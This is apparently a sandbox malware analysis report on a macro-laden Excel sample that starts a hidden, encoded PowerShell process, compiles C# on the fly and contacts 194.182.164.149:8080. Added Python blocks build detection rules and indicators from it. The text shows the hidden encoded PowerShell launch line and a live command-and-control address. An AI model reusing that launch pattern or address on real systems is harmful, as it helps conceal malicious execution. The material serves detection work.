Malware Analysis Report

2024-12-07 15:16

Sample ID 241113-1n6hrayqg1
Target 4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f
SHA256 4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f
Tags
macro macro_on_action discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f

Threat Level: Known bad

The file 4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action discovery execution

Process spawned unexpected child process

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Office macro that triggers on suspicious action

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 21:48

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 21:48

Reported

2024-11-13 21:49

Platform

win7-20241010-en

Max time kernel

13s

Max time network

18s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f.xls

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2880 wrote to memory of 2700 (4 events) | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 1276 (4 events) | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1276 wrote to memory of 2408 (4 events) | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f.xls

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc <encoded command elided>

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tv7gbzig.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D16.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6D15.tmp"
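
The process tree above is the part of this report worth turning into detection logic: EXCEL.EXE spawns powershell.exe with -nop -w hidden -Enc, and that PowerShell in turn spawns csc.exe and cvtres.exe, which is the footprint of PowerShell's Add-Type compiling C# source on the fly. The block below is an added example, not part of the sandbox output. It replays the chain as constructed process-creation events (PIDs 2880, 2700, 1276 and 2408 taken from the WriteProcessMemory rows; the document name is shortened; the encoded command is a harmless constructed placeholder, because the real one is elided above), decodes the -EncodedCommand argument the way PowerShell does (base64 of UTF-16LE text, any unambiguous prefix of the switch accepted) and flags the two parent/child relationships. The image-name sets are the example's own assumptions, not something the report states.

```python
"""Added example: detection logic for the Excel -> PowerShell -> csc.exe chain
seen in behavioral1. Not part of the sandbox report; events are constructed."""
import base64
import binascii

# Assumed rule tables (not from the report): Office hosts, script hosts, compilers
OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}  # launched from %WINDIR%\Microsoft.NET by Add-Type


def image_name(path):
    """Basename of a Windows image path, lower-cased, so one rule covers Office14 and Office16 paths."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (or any unambiguous prefix: -e, -ec, -enc, ...),
    or None. PowerShell expects base64 of the UTF-16LE script text."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in "-/" and len(tok) > 1 and "encodedcommand".startswith(tok[1:].lower()):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def hidden_window(cmdline):
    """True when -WindowStyle hidden (or a prefix such as -w hidden, as in this sample) is present."""
    tokens = cmdline.lower().split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in "-/" and len(tok) > 1 and "windowstyle".startswith(tok[1:]) and tokens[i + 1] == "hidden":
            return True
    return False


def find_suspicious_chains(events):
    """Evaluate parent/child rules over a list of {pid, ppid, image, cmdline} events."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        child = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        par = image_name(parent["image"]) if parent else None
        if par in OFFICE_IMAGES and child in SCRIPT_HOSTS:
            findings.append({"rule": "office_spawns_script_host", "pid": e["pid"], "ppid": e["ppid"]})
        if child in POWERSHELL:
            script = decode_encoded_command(e["cmdline"])
            if script is not None:
                findings.append({"rule": "encoded_powershell_command", "pid": e["pid"],
                                 "hidden_window": hidden_window(e["cmdline"]), "script": script})
        if par in POWERSHELL and child in COMPILERS:
            findings.append({"rule": "powershell_add_type_compile", "pid": e["pid"], "ppid": e["ppid"]})
    return findings


# Constructed events modelled on behavioral1 (PIDs from the WriteProcessMemory rows).
# The real encoded command is elided in the report; this placeholder stands in for it.
PLACEHOLDER_SCRIPT = "Write-Output 'constructed placeholder, not the sample payload'"
ENC = base64.b64encode(PLACEHOLDER_SCRIPT.encode("utf-16-le")).decode("ascii")
OFFICE14 = r"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"
CVTRES = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe"
SAMPLE_EVENTS = [
    {"pid": 2880, "ppid": 0, "image": OFFICE14,
     "cmdline": f'"{OFFICE14}" /dde C:\\Users\\Admin\\AppData\\Local\\Temp\\sample.xls'},  # name shortened
    {"pid": 2700, "ppid": 2880, "image": PS, "cmdline": f"powershell.exe -nop -w hidden -Enc {ENC}"},
    {"pid": 1276, "ppid": 2700, "image": CSC,
     "cmdline": f'"{CSC}" /noconfig /fullpaths @"C:\\Users\\Admin\\AppData\\Local\\Temp\\tv7gbzig.cmdline"'},
    {"pid": 2408, "ppid": 1276, "image": CVTRES,
     "cmdline": f'{CVTRES} /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\\Users\\Admin\\AppData\\Local\\Temp\\RES6D16.tmp"'},
]

if __name__ == "__main__":
    for finding in find_suspicious_chains(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed events this yields three findings: the Office-to-PowerShell spawn, the encoded hidden-window command with its decoded text, and the PowerShell-to-csc.exe compile. Two caveats when reading the signatures above: the "System Language Discovery" rows are weak on their own, since the same NLS\Language key is opened here by csc.exe, cvtres.exe and EXCEL.EXE as well as by PowerShell; and the WriteProcessMemory rows are parent-to-direct-child only, which ordinary process creation produces, so they add nothing beyond the spawn relationships the rules above already capture.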

Network

Country | Destination | Domain | Proto
CH | 194.182.164.149:8080 | (none) | tcp

Files

memory/2880-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2880-1-0x0000000071E9D000-0x0000000071EA8000-memory.dmp

memory/2880-3-0x00000000001B0000-0x00000000002B0000-memory.dmp

memory/2880-2-0x00000000001B0000-0x00000000002B0000-memory.dmp

memory/2880-9-0x00000000001B0000-0x00000000002B0000-memory.dmp

memory/2880-8-0x00000000001B0000-0x00000000002B0000-memory.dmp

memory/2880-6-0x00000000001B0000-0x00000000002B0000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\tv7gbzig.cmdline

MD5 63d8a39999eb2ec6d4bcf407f2aeaa01
SHA1 67f0e3558ca78292bf1dfa226e78dbadd9f30ad6
SHA256 2cf45083deeaac7fe14f2ad2d4dd9d83d221952c8f5b6a767e4dae39eb16d959
SHA512 880e0a7f239bd1736dc84afbc77cad2a3414557ad01b0f2a1d2fd05a772b3ca749ea81833676a9b960a0d20f076f1a7cfc5cd457ad161faea855ae5d0eed7182

\??\c:\Users\Admin\AppData\Local\Temp\tv7gbzig.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

\??\c:\Users\Admin\AppData\Local\Temp\CSC6D15.tmp

MD5 5026443a29e9e7006de9dcb8c70524e1
SHA1 7a63a998109591d51aba0b3c943141ab53a73e25
SHA256 851d5a4c0e8af1da616c615c1fc667ac4bb6856ea7c2dee16ef8eff47533fb6c
SHA512 fa66ae06b2d53841ab451d9c5f13e19af609215204e936d4cee7721b5a8c613933f6351e30385da051fbdae7465d29022fc42709337aed5c891e9db21cfbcf26

C:\Users\Admin\AppData\Local\Temp\RES6D16.tmp

MD5 86454fd99bdaa9255ad7a4559cd8d21b
SHA1 46b547e0a1f8ba27e1fd9d49aa4a97e596b26e4a
SHA256 b6c62692d635bf683a6429726e157daca87023f06f3be0219deb81243649a55d
SHA512 2a766eda9cf724a9a1ff62a0e0259a4854ce8c98a5bec6ad1705ba6f939f95a94599cb5ff2d9f672ce9903619b050a56c393937fac1177185fcef0afa4b327e7

C:\Users\Admin\AppData\Local\Temp\tv7gbzig.dll

MD5 42b655f7508cde94798963a8aa8cb232
SHA1 b5a5f12fe20b066b58a6128b6ce425244cf986b9
SHA256 c9a9cb0f8be26e133e53fb61ca64d89adf09c41c3ebad645f302e29a8010d691
SHA512 cff543f7b4f6c23d91eff1e79caa039d06ec2595d481ce0f76e54a78e114e92bfb65133eff21c09befc5391b212a3469f839be62edc637407b83796ba1051555

C:\Users\Admin\AppData\Local\Temp\tv7gbzig.pdb

MD5 020a6a2789ad17ed649087565397b229
SHA1 487227dabd2ae81077a4de19e30be9960c5837a1
SHA256 073f76a6281e5a34f1879b246c96522e6babefc2114fef20d8ed358dfedaf70e
SHA512 dec9e2d57daf50edd9943e243564664acc0a12f8d1b9c6b74f843eb248e16c9a0816dd71f3d10304735b2ea48fa8d92ae20c30685c21548c1281f88442961128

memory/2880-27-0x0000000071E9D000-0x0000000071EA8000-memory.dmp

memory/2880-28-0x00000000001B0000-0x00000000002B0000-memory.dmp

memory/2880-29-0x00000000001B0000-0x00000000002B0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 21:48

Reported

2024-11-13 21:49

Platform

win10v2004-20241007-en

Max time kernel

33s

Max time network

36s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f.xls"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f.xls"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc <encoded command elided>

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2268.tmp" "c:\Users\Admin\AppData\Local\Temp\5sljfrdp\CSC60297B08AA304B0F96162B44A9442652.TMP"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | roaming.officeapps.live.com | udp
GB | 52.109.28.47:443 | roaming.officeapps.live.com | tcp
US | 8.8.8.8:53 | 47.28.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp
CH | 194.182.164.149:8080 | (none) | tcp
US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp
US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 71.208.201.84.in-addr.arpa | udp

Files

memory/2176-0-0x00007FFF0EF50000-0x00007FFF0EF60000-memory.dmp

memory/2176-1-0x00007FFF4EF6D000-0x00007FFF4EF6E000-memory.dmp

memory/2176-3-0x00007FFF0EF50000-0x00007FFF0EF60000-memory.dmp

memory/2176-2-0x00007FFF0EF50000-0x00007FFF0EF60000-memory.dmp

memory/2176-4-0x00007FFF0EF50000-0x00007FFF0EF60000-memory.dmp

memory/2176-5-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-6-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-8-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-9-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-7-0x00007FFF0EF50000-0x00007FFF0EF60000-memory.dmp

memory/2176-12-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-14-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-13-0x00007FFF0C9D0000-0x00007FFF0C9E0000-memory.dmp

memory/2176-16-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-17-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-20-0x00007FFF0C9D0000-0x00007FFF0C9E0000-memory.dmp

memory/2176-19-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-18-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-15-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-11-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-10-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-29-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-30-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgj0fima.qj1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4268-45-0x0000022A51970000-0x0000022A51992000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.cmdline

MD5 31010d98ce65c8ce58a910cb6d823e17
SHA1 2101cd82911e30ad13c4c9ffb05bb12c823ca2c0
SHA256 fd2188309eb3acdbbb86e2bdc9ac56fb845618b134fc98d7b8e5cc807b7a9548
SHA512 f4ed598bd84524f0b7660d2d496da81bf15809332214a5ae4617a297ee7af5007a6ee8937a7aaaf13b33f91001797638ba20def87f4eb9b0c6f4bbc9e77330be

\??\c:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

\??\c:\Users\Admin\AppData\Local\Temp\5sljfrdp\CSC60297B08AA304B0F96162B44A9442652.TMP

MD5 1618c0fb414adfdc0e55f10fe3220dc8
SHA1 219e4cd8c6ead6029e5c6180d1b700f4f2bf2e36
SHA256 fc3c058707372dc8f51aa038d8fd9c62281ae6cf372416cef1b88825a4e4dd59
SHA512 e57871058d39da751bf8092191a865ec2f32f71f625f3d9a3c8f9594ec88730b7f975a88869636c4d63c2f7d5ad0b1fa9226adb1ea77246cfaffcacc433dbc3a

C:\Users\Admin\AppData\Local\Temp\RES2268.tmp

MD5 ae0ec87d0780cd281b85f0dab6d10796
SHA1 3d387c55123665f172ed50443d3cab4b54928ba6
SHA256 ab806d1372e5bb560a0ebf693dc5315462aee75c80c097ca71e53c2e6370508d
SHA512 3dc063df5e42e386f4d702c39e791cc414301e80f02ce6a64e3d07b2ac90acd53415ab3d2b79c9ae521d8b0bb3e7513df26e630a81cd37480861c022468f3781

C:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.dll

MD5 b867c862644547520312c4bf29fc946f
SHA1 869cdc4cc9bcc87c1112d6f487d11d8e7c693ee3
SHA256 6a5026cc589b8ca5db702fb8976a3daba5a94bf1ed1de8c8fd0cb7dc898fc707
SHA512 dccacf6de7b90e546507e9afd5ea17413d038bbd25348737a66bb8792d0c076f4ae71c1ae30c67449aac55407a9a12b29ddf34a618bc8481c7ad91fc427f079f

memory/4268-58-0x0000022A51850000-0x0000022A51858000-memory.dmp

memory/2176-60-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-63-0x00007FFF4EF6D000-0x00007FFF4EF6E000-memory.dmp

memory/2176-64-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-65-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-69-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 b78d36311a167ef513f6ed277b7929a0
SHA1 212dade9bf9fe79bdc92e77e56c3ea410cafc3b2
SHA256 3a56e0a4c14aaf0270f6871e6490a12696c233cd0bae0b7dfdd841e81ba1b811
SHA512 93f0d8b49d7a3570fedfe0917d6a4515584000f794270fd47fd23c83d6b0e4bebf083867ec0b2f8bd6fc1da6e403b31ee76b71213b7fdd173b20353c02c12445
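
The two Files sections carry one detail worth extracting: the C# source that the PowerShell stage hands to csc.exe (tv7gbzig.0.cs on Windows 7 with the v2.0.50727 compiler, 5sljfrdp\5sljfrdp.0.cs on Windows 10 with the Framework64 v4.0.30319 compiler) has the same SHA-256 in both runs, while every other compile artifact (.cmdline, RES*.tmp, CSC*.tmp, .dll, .pdb) carries a per-run random name and a different hash. The block below is an added example, not part of the sandbox report. It transcribes both file lists, classifies the Add-Type compiler temp files by the naming pattern visible above (the 8-character base name and the RES/CSC hex names are an inference from these two runs, not something the report states) and joins the runs on hash to keep only the indicator that survives across them.

```python
"""Added example: turning the Files sections of both runs into indicators.
Not part of the sandbox report; the lists below are transcribed from it."""
import re

# Temp files that csc.exe / cvtres.exe leave behind when PowerShell's Add-Type compiles
# C# on the fly: an 8-character random base name (tv7gbzig, 5sljfrdp here) with fixed
# suffixes, plus RES<hex>.tmp / CSC<hex>.tmp. Pattern inferred from the two runs above.
ADD_TYPE_RE = re.compile(
    r"(?i)[\\/]Temp[\\/](?:[a-z0-9]{8}[\\/])?"
    r"(?:[a-z0-9]{8}\.(?:cmdline|0\.cs|dll|pdb)|(?:RES|CSC)[0-9A-F]+\.tmp)$"
)


def classify(path):
    """Label a dropped-file path from the report as an Add-Type compile artifact or not."""
    return "add_type_compile_artifact" if ADD_TYPE_RE.search(path) else "other"


def stable_across_runs(run_a, run_b):
    """Files whose SHA-256 recurs in both runs although the per-run random names differ.
    Only those are worth keeping as indicators; the rest change hash from run to run."""
    by_hash = {f["sha256"]: f["path"] for f in run_a}
    return [
        {"sha256": f["sha256"], "kind": classify(f["path"]), "paths": [by_hash[f["sha256"]], f["path"]]}
        for f in run_b if f["sha256"] in by_hash
    ]


# Transcribed from the behavioral1 (Windows 7) Files section
RUN1 = [
    {"path": r"\??\c:\Users\Admin\AppData\Local\Temp\tv7gbzig.cmdline",
     "sha256": "2cf45083deeaac7fe14f2ad2d4dd9d83d221952c8f5b6a767e4dae39eb16d959"},
    {"path": r"\??\c:\Users\Admin\AppData\Local\Temp\tv7gbzig.0.cs",
     "sha256": "2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319"},
    {"path": r"\??\c:\Users\Admin\AppData\Local\Temp\CSC6D15.tmp",
     "sha256": "851d5a4c0e8af1da616c615c1fc667ac4bb6856ea7c2dee16ef8eff47533fb6c"},
    {"path": r"C:\Users\Admin\AppData\Local\Temp\RES6D16.tmp",
     "sha256": "b6c62692d635bf683a6429726e157daca87023f06f3be0219deb81243649a55d"},
    {"path": r"C:\Users\Admin\AppData\Local\Temp\tv7gbzig.dll",
     "sha256": "c9a9cb0f8be26e133e53fb61ca64d89adf09c41c3ebad645f302e29a8010d691"},
    {"path": r"C:\Users\Admin\AppData\Local\Temp\tv7gbzig.pdb",
     "sha256": "073f76a6281e5a34f1879b246c96522e6babefc2114fef20d8ed358dfedaf70e"},
]

# Transcribed from the behavioral2 (Windows 10) Files section
RUN2 = [
    {"path": r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgj0fima.qj1.ps1",
     "sha256": "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7"},
    {"path": r"\??\c:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.cmdline",
     "sha256": "fd2188309eb3acdbbb86e2bdc9ac56fb845618b134fc98d7b8e5cc807b7a9548"},
    {"path": r"\??\c:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.0.cs",
     "sha256": "2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319"},
    {"path": r"\??\c:\Users\Admin\AppData\Local\Temp\5sljfrdp\CSC60297B08AA304B0F96162B44A9442652.TMP",
     "sha256": "fc3c058707372dc8f51aa038d8fd9c62281ae6cf372416cef1b88825a4e4dd59"},
    {"path": r"C:\Users\Admin\AppData\Local\Temp\RES2268.tmp",
     "sha256": "ab806d1372e5bb560a0ebf693dc5315462aee75c80c097ca71e53c2e6370508d"},
    {"path": r"C:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.dll",
     "sha256": "6a5026cc589b8ca5db702fb8976a3daba5a94bf1ed1de8c8fd0cb7dc898fc707"},
    {"path": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms",
     "sha256": "3a56e0a4c14aaf0270f6871e6490a12696c233cd0bae0b7dfdd841e81ba1b811"},
]

if __name__ == "__main__":
    for hit in stable_across_runs(RUN1, RUN2):
        print(hit)
```

Joining the two lists on hash leaves exactly one entry, the .0.cs source, and the classifier tags it as a compile artifact; the compiled .dll, the .cmdline response file and the RES/CSC temp files all differ between runs, so their hashes are not reusable indicators, and the __PSScriptPolicyTest_*.ps1 file is PowerShell's own AppLocker/WDAC policy probe rather than something the sample dropped.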